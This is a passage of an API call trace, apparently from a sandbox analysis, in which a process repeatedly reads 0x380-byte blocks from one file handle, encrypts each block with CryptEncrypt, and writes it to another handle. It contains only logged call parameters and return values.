lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.623] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.623] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.623] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.623] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.623] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.623] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.624] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.625] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.625] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.625] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.625] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.625] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.625] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.625] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.625] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.625] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.626] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.627] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.627] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.627] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.627] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.627] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.627] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.628] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.628] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.628] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.628] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.628] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.629] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.630] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: 